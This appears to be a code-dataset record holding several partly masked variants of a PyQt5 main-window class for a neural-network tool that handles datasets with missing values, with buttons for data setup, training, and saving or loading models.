resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n 
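# Nearly every control in initUI repeats setFont(QFont('微软雅黑', 16)). A sketch
# of one way to apply the shared font in a single pass; the widget tuple is
# abbreviated, and QApplication.setFont(ui_font) would set an application-wide
# default instead:
ui_font = QFont('微软雅黑', 16)
for w in (self.dataFileChooseButton, self.dataLossSimulateSettingButton,
          self.dataShowButton, self.presentDataName):
    w.setFont(ui_font)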
self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n <function token>\n <function token>\n <function 
token>\n <function token>\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n 
QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n 
label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n 
setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n 
label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n 
trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = 
QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n 